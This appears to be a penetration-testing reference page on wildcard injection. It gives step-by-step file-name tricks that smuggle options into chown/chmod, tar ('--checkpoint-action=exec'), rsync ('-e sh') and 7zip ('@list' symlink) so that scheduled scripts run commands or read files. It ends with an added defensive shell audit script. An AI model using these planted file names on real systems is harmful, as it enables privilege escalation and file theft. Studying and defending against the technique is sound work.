Wildcard Exploits

Chown & Chmod - Modify execution

Case

chown -R nobody:nobody folder/*.ext
chmod -R 620 folder/*.ext

Exploitation:

  1. Navigate to the folder

  2. Create a file called drf.ext

  3. Create a file called --reference=.drf.php

  4. When the script is executed, the filename created in step 3 is parsed as a parameter, so the owner or permissions specified in the script are overridden by those of the file the parameter points to (in this case drf.ext).

Tar - Arbitrary command execution

Case

tar cvf archive.tar *

Exploitation:

  1. Navigate to the folder

  2. Create a file called --checkpoint=1

  3. Create a file called --checkpoint-action=exec=sh <cmd or script>

  4. When the tar command runs, the specified command is executed. Keep in mind that path separators are forbidden in filenames, so your script must be in the same folder as the files created previously or in a path defined in your environment variables.

Rsync - Arbitrary command execution

Case

rsync -t *.ext

Exploitation:

  1. Navigate to the target folder

  2. Create a shell script called shell.ext (use shell.sh if the wildcard has no extension specified). Put any command you wish to execute in the script.

  3. Create a new file called -e sh <shell file>

  4. When the rsync command runs, the script created in step 2 is executed.

7zip - Arbitrary file read

Case (works regardless of the -- operator)

7za a file.zip -t7z -snl -- folder/*.ext

Exploitation:

  1. Navigate to the target folder

  2. Create a file called @list.txt

  3. ln -s <target file> list.txt

  4. Once the command runs, the file pointed to by the link list.txt is included in the archive, allowing us to read it.
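
Detection and hardening for the four cases above, as an added example that is not part of the original page: audit_dir flags entries whose names begin with "-" or "@", and demo compares what a tool receives from a bare glob with the "./" form. The function names and the sample file names are constructed for illustration.

```shell
#!/bin/sh
# Added example: audit a directory for file names that an unquoted wildcard
# would hand to a tool as an option (leading "-") or list file (leading "@").

# audit_dir DIR: print each suspicious entry name, one per line.
# Returns 0 when the directory is clean, 1 when something was found.
audit_dir() {
    dir=$1
    found=0
    for path in "$dir"/*; do
        # Skip the literal pattern left behind when the directory is empty.
        [ -e "$path" ] || [ -L "$path" ] || continue
        name=${path##*/}
        case $name in
            -*|@*) printf '%s\n' "$name"; found=1 ;;
        esac
    done
    [ "$found" -eq 0 ]
}

# count_optionlike ARGS...: how many arguments start with "-" or "@".
# Call it with the same glob the real command line uses.
count_optionlike() {
    n=0
    for arg in "$@"; do
        case $arg in
            -*|@*) n=$((n + 1)) ;;
        esac
    done
    printf '%s\n' "$n"
}

# demo: build a scratch directory with constructed names and compare the
# bare glob with the "./" form. Prints "<bare> <prefixed>".
demo() {
    scratch=$(mktemp -d) || return 1
    : > "$scratch/report.ext"
    : > "$scratch/--example-flag.ext"   # constructed, option-like name
    : > "$scratch/@example-list.ext"    # constructed, list-file-like name
    bare=$(cd "$scratch" && count_optionlike *.ext)
    safe=$(cd "$scratch" && count_optionlike ./*.ext)
    rm -rf -- "$scratch"
    printf '%s %s\n' "$bare" "$safe"
}
```

Writing the wildcard as ./*.ext in maintenance scripts means no expanded name can begin with "-" or "@", and running audit_dir on writable directories before a privileged job surfaces planted names.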
